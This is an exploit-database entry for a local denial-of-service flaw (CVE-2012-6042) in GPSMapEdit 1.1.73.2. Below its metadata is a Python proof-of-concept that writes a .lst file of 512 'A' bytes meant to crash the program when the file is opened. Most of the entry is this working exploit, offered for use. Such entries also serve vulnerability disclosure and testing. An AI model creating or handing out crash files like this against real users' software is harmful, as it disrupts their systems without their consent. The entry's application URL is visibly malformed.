GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service
Author: Julien Ahrens
type: dos
platform: windows
port:
date_added: 2012-01-09
date_updated: 2012-03-16
verified: 1
codes: OSVDB-82478;CVE-2012-6042
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt18500/18339.png
application_url: http://www.exploit-db.commapedit1-1-73-2-setup.exe
#!/usr/bin/python
# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability
# Version: 1.1.73.2
# Date: 2012-01-08
# Author: Julien Ahrens
# Homepage: www.inshell.net
# Software Link: http://www.geopainting.com
# Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German
file="GPSMapEdit_crash.lst"
junk="\x41"*512
print "[*] Creating crash file...\n";
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n";